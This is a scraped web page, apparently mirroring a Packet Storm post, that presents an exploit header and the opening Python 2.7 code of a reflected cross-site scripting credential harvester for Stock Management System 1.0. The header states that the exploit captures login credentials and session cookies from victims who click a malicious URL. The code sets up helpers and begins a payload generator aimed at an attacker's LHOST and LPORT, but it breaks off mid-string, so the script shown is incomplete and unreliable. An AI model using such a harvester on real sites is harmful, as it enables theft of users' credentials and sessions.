Stock Management System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 5th, 2020 📆 | 3159 Views ⚑

0

Stock Management System 1.0 Cross Site Scripting ≈ Packet Storm

# Exploit Title: Stock Management System v1.0 – Cross-Site Scripting Credential Harvester (Login-Portal)
# Exploit Author: Bobby Cooke
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# Version: 1.0
# CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – Type 1: Reflected XSS
# CWE-523: Unprotected Transport of Credentials
# OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS)
# CVSS Base Score: 6.4 | Impact Subscore: 4.7 | Exploitability Subscore: 1.6
# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# Vulnerability Description:
# Reflected Cross-Site Scripting (XSS) vulnerability in ‘index.php’ login-portal webpage of SourceCodesters
# Stock Management System v1.0 allows remote attackers to harvest login credentials & session cookie via
# unauthenticated victim clicking malicious URL and entering credentials.

import socket,sys,urllib,re
from thread import *
from colorama import Fore, Back, Style

F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
info = S[3]+F[5]+'[‘+S[0]+S[3]+’-‘+S[3]+F[5]+’]’+S[0]+’ ‘
err = S[3]+F[2]+'[‘+S[0]+S[3]+’!’+S[3]+F[2]+’]’+S[0]+’ ‘
ok = S[3]+F[3]+'[‘+S[0]+S[3]+’+’+S[3]+F[3]+’]’+S[0]+’ ‘

def urlEncode(javascript):
return urllib.quote(javascript)

def genXssPayload(LHOST,LPORT):
XSS_PAYLOAD = ‘/” method=”post” id=”loginForm”>

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...